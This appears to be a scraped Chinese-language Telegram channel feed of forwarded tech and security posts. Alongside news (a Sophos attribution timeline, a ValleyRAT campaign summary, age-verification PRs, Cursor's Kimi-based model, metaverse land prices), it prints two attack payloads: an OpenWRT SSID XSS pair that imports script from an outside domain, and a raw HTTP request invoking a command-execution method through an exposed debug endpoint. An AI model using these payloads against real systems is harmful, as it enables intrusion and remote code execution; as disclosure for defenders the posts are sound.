Forwarded from 咕 Billchen 咕 🐱 抹茶芭菲批发中心 (billchenchina | 缩缩)
CVE-2026-32721, XSS fixed in OpenWRT 24.10.6 / 25.12.1
tldr:
SSID 1: <a id=s href=//domain/x.js>
SSID 2: <img src=x onerror=import(s)>
https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
tldr:
SSID 1: <a id=s href=//domain/x.js>
SSID 2: <img src=x onerror=import(s)>
https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
mxsasha.eu
Root from the parking lot: OpenWRT XSS through SSID scanning (CVE-2026-32721)
Lately, I’ve been experimenting with unusual XSS vectors. XSS (cross-site scripting) allows an attacker to execute arbitrary JavaScript in another …
Forwarded from [Patience Forever]
回过头又仔细看了下 Sophos 溯源关天峰。
2018年,Sophos 的印度子公司遭受了攻击,并被部署内核级(Netfilter)的 Rootkit.
2020年,Sophos X-Ops 团队主要通过:漏洞赏金和遥测信息追踪到 Gbigmao 位于四川无声科技。同时,还追踪到另一位于成都的电子科技大学背景的 TStark.
2021年,攻击者开始反制遥测系统,并被记录。
2022年,著名的 CVE-2022-1040 被一位自称来自日本的匿名研究人员提交,并拿到了2万美元赏金,但 Sophos 发现其 IP 地址位于中国,并且该漏洞在被提交给官方前,就已被用于实战攻击和此前相同的目标(西藏)。并且 Sophos 再次通过遥测和管理员帐户的电子邮件地址关联到一位中国攻击性安全研究员和 Linux shellcode 专家。
> 攻击者通过部署 JAVA 内存马,并用 LD_PRELOAD 注入 SSHD 实现持久化,同时还会窃取管理员面板登录密码。在 CVE-2022-3236 中使用了 Perl 作为持久化。
防火墙/杀毒软件能够通过遥测精准锁定个人终端,获取设备上的文件,甚至能通过定向推送更新远控设备。
Sophos 如何标记需要远控的设备?频繁电源循环,固件回滚,免费网络邮箱,大量设备运行着不同且频繁更新的固件版本,LAN口连接的设备数量极少,WAN口使用私有 IP 地址并通过其他设备中转。此外,其他行为也可能触发告警:
(1)异常系统命令:向临时目录写入和执行文件,运行自带黑客工具(masscan),使用 vim 直接编辑并运行脚本,flashrom和dd等命令
(2)异常数据库字段
(3)反常外连
参考:
Pacific Rim timeline: Information for defenders from a braid of interlocking attack campaigns
‘Cloud Snooper’ Attack Bypasses Firewall Security Measures
Inside a Firewall Vendor's 5-Year War With the Chinese Hackers Hijacking Its Devices
2018年,Sophos 的印度子公司遭受了攻击,并被部署内核级(Netfilter)的 Rootkit.
2020年,Sophos X-Ops 团队主要通过:漏洞赏金和遥测信息追踪到 Gbigmao 位于四川无声科技。同时,还追踪到另一位于成都的电子科技大学背景的 TStark.
2021年,攻击者开始反制遥测系统,并被记录。
2022年,著名的 CVE-2022-1040 被一位自称来自日本的匿名研究人员提交,并拿到了2万美元赏金,但 Sophos 发现其 IP 地址位于中国,并且该漏洞在被提交给官方前,就已被用于实战攻击和此前相同的目标(西藏)。并且 Sophos 再次通过遥测和管理员帐户的电子邮件地址关联到一位中国攻击性安全研究员和 Linux shellcode 专家。
> 攻击者通过部署 JAVA 内存马,并用 LD_PRELOAD 注入 SSHD 实现持久化,同时还会窃取管理员面板登录密码。在 CVE-2022-3236 中使用了 Perl 作为持久化。
防火墙/杀毒软件能够通过遥测精准锁定个人终端,获取设备上的文件,甚至能通过定向推送更新远控设备。
Sophos 如何标记需要远控的设备?频繁电源循环,固件回滚,免费网络邮箱,大量设备运行着不同且频繁更新的固件版本,LAN口连接的设备数量极少,WAN口使用私有 IP 地址并通过其他设备中转。此外,其他行为也可能触发告警:
(1)异常系统命令:向临时目录写入和执行文件,运行自带黑客工具(masscan),使用 vim 直接编辑并运行脚本,flashrom和dd等命令
(2)异常数据库字段
(3)反常外连
参考:
Pacific Rim timeline: Information for defenders from a braid of interlocking attack campaigns
‘Cloud Snooper’ Attack Bypasses Firewall Security Measures
Inside a Firewall Vendor's 5-Year War With the Chinese Hackers Hijacking Its Devices
Sophos
Pacific Rim timeline: Information for defenders from a braid of interlocking attack campaigns
Sophos X-Ops unveils five-year investigation tracking China-based groups targeting perimeter devices
Forwarded from K4YT3X's Channel (K4YT3X)
有这么个伄人 dylanmtaylor 在到处开 PR 给个个 Linux 系统加出生日期的支持,甚至 systemd 已经 merge 了,不知道这人是不是 Facebook 或者什么政府的人
https://github.com/systemd/systemd/pull/40954
https://github.com/archlinux/archinstall/pull/4290
https://github.com/canonical/ubuntu-desktop-provision/pull/1338
我还没看到 Arch 的讨论,如果有的话我也得说两句,但是我本人坚决反对给 OS 加 censorship;California 用户想用可以去自己 fork 每一个 distro,为自己州通过的**法律买单
要保证你家孩子不看你不想他看的东西你可以设置 parental control 和 family DNS,一点时间都没有的话那就别生
一个二个都要上传 ID 验证年龄,真的看得我血压高
最近相关的负面消息太多了,我可能考虑写一篇 blog 详细讨论一下这个问题,但是在这个问题平息之前我会不断表明立场、游说身边的人反对法案,和开发类似 conclave 的项目对抗这些侵犯隐私的法律和措施
https://github.com/systemd/systemd/pull/40954
https://github.com/archlinux/archinstall/pull/4290
https://github.com/canonical/ubuntu-desktop-provision/pull/1338
我还没看到 Arch 的讨论,如果有的话我也得说两句,但是我本人坚决反对给 OS 加 censorship;California 用户想用可以去自己 fork 每一个 distro,为自己州通过的**法律买单
要保证你家孩子不看你不想他看的东西你可以设置 parental control 和 family DNS,一点时间都没有的话那就别生
一个二个都要上传 ID 验证年龄,真的看得我血压高
最近相关的负面消息太多了,我可能考虑写一篇 blog 详细讨论一下这个问题,但是在这个问题平息之前我会不断表明立场、游说身边的人反对法案,和开发类似 conclave 的项目对抗这些侵犯隐私的法律和措施
❤5
cursor基于kimi k2.5微调模型且没有注明,被发现了还在顾左右而言他
结果kimi今天凌晨帮他们官宣了
https://x.com/leerob/status/2035035355364081694
https://x.com/Kimi_Moonshot/status/2035074972943831491
结果kimi今天凌晨帮他们官宣了
https://x.com/leerob/status/2035035355364081694
https://x.com/Kimi_Moonshot/status/2035074972943831491
🧵 Thread • FixupX
Lee Robinson (@leerob)
Yep, Composer 2 started from an open-source base! We will do full pretraining in the future.
Only ~1/4 of the compute spent on the final model came from the base, the rest is from our training. This is why evals are very different.
And yes, we are following…
Only ~1/4 of the compute spent on the final model came from the base, the rest is from our training. This is why evals are very different.
And yes, we are following…
还有一个疑点是cursor好像直接拿到了base模型进行训练,kimi也同时确认了他们有授权
cursor连授权都拿到了却连提一嘴kimi都不愿意,能骗得了谁
cursor连授权都拿到了却连提一嘴kimi都不愿意,能骗得了谁
Forwarded from Eternal_安全内参
POST /papi/esearch/data/devops/dubboApi/debug/method?interfaceName=cn.hutool.core.util.RuntimeUtil&methodName=execForStr HTTP/1.1
Host:
Content-Type: application/json
Content-Length: 14
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
[["whoami"]]
Forwarded from LoopDNS资讯播报
银狐木马疑似在 Telegram 不同主题群组中批量传播
近期,我们持续接收到多份来自 Telegram 群组场景的可疑样本。尽管这些样本在文件命名、内容伪装和社工主题上各不相同,但其执行链、下载逻辑、侧载方式、持久化痕迹及通信配置高度一致,显示出明显的工程化投递特征。结合投稿来源和样本比对结果研判,这是一轮疑似由银狐相关团伙面向不同主题 Telegram 群组实施的批量化定向投递活动。本文将围绕该批样本的攻击流程、持久化机制、网络伪装与家族指纹展开分析,并结合 Winos4 / ValleyRAT 特征进行关联研判,为安全防护与事件响应提供参考。
阅读全文
近期,我们持续接收到多份来自 Telegram 群组场景的可疑样本。尽管这些样本在文件命名、内容伪装和社工主题上各不相同,但其执行链、下载逻辑、侧载方式、持久化痕迹及通信配置高度一致,显示出明显的工程化投递特征。结合投稿来源和样本比对结果研判,这是一轮疑似由银狐相关团伙面向不同主题 Telegram 群组实施的批量化定向投递活动。本文将围绕该批样本的攻击流程、持久化机制、网络伪装与家族指纹展开分析,并结合 Winos4 / ValleyRAT 特征进行关联研判,为安全防护与事件响应提供参考。
阅读全文
Telegraph
疑似银狐针对不同主题 Telegram 群组实施批量化社工投递的 Winos4/ValleyRAT 木马活动分析
概述 近期,我们频道的技术团队连续接到多起可疑样本投稿。投稿样本虽然在外层文件命名、文件内容伪装和社工主题上存在差异,但在执行链、下载逻辑、落地路径、侧载方式和通信配置上表现出高度一致性。结合投稿来源信息研判,这批样本并非针对单一场景投放,而是疑似由同一黑产团伙根据不同群组主题进行批量定制分发。 现有线索显示,相关样本主要来自不同类型的 Telegram 聊天群、资源分享群和垂直兴趣群。攻击者疑似先批量获取目标群组并加入,再依据群组内容方向调整诱饵名称和文件包装形式,例如围绕影视资源、软件下载、工具分享…
Forwarded from 蓝点网订阅频道
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from [Patience Forever]
恶意软件也可以调用 Windows WLAN API 来枚举附近的无线接入点(AP)信息,然后通过 Google Geolocation API 获取大致的地理坐标。
https://x.com/realNyarime/status/2035287134375145516
Smoke Loader Drops Whiffy Recon Wi-Fi Scanning and Geolocation Malware
https://x.com/realNyarime/status/2035287134375145516
Smoke Loader Drops Whiffy Recon Wi-Fi Scanning and Geolocation Malware
X (formerly Twitter)
奶昔🥤 (@realNyarime) on X
原来台式机没有GPS模块也能靠WiFi定位?我访问了北京竞心科技有限公司的LBS仓库(https://t.co/EldgZahgWx),根据自己的相关信息查询了下,得到的结果相当精准!
Forwarded from 科技圈🎗在花频道📮
元宇宙所谓“地产”价格崩溃,平均下跌 72%,最高跌幅超过 99%
2021 至 2022 年元宇宙热潮期间,各平台虚拟地块以天价成交,而如今绝大多数已跌至历史高点的零头。CoinGecko 数据显示,截至 2024 年 6 月,元宇宙平均地价已较峰值下跌 72%,其中 The Sandbox 跌幅达 95%、Decentraland 跌 89%、Otherdeed for Otherside 跌 85%。
例如 2021 年紧邻 Snoop Dogg 地产的 Snoopverse 庄园以约 45 万美元成交,当前底价折算仅剩约 1025 美元,跌幅 99.8%;Meta 旗下 Reality Labs 在 2025 年单年亏损高达 191.2 亿美元。
TechStory
🌸 在花频道|茶馆讨论|投稿通道
2021 至 2022 年元宇宙热潮期间,各平台虚拟地块以天价成交,而如今绝大多数已跌至历史高点的零头。CoinGecko 数据显示,截至 2024 年 6 月,元宇宙平均地价已较峰值下跌 72%,其中 The Sandbox 跌幅达 95%、Decentraland 跌 89%、Otherdeed for Otherside 跌 85%。
例如 2021 年紧邻 Snoop Dogg 地产的 Snoopverse 庄园以约 45 万美元成交,当前底价折算仅剩约 1025 美元,跌幅 99.8%;Meta 旗下 Reality Labs 在 2025 年单年亏损高达 191.2 亿美元。
TechStory
🌸 在花频道|茶馆讨论|投稿通道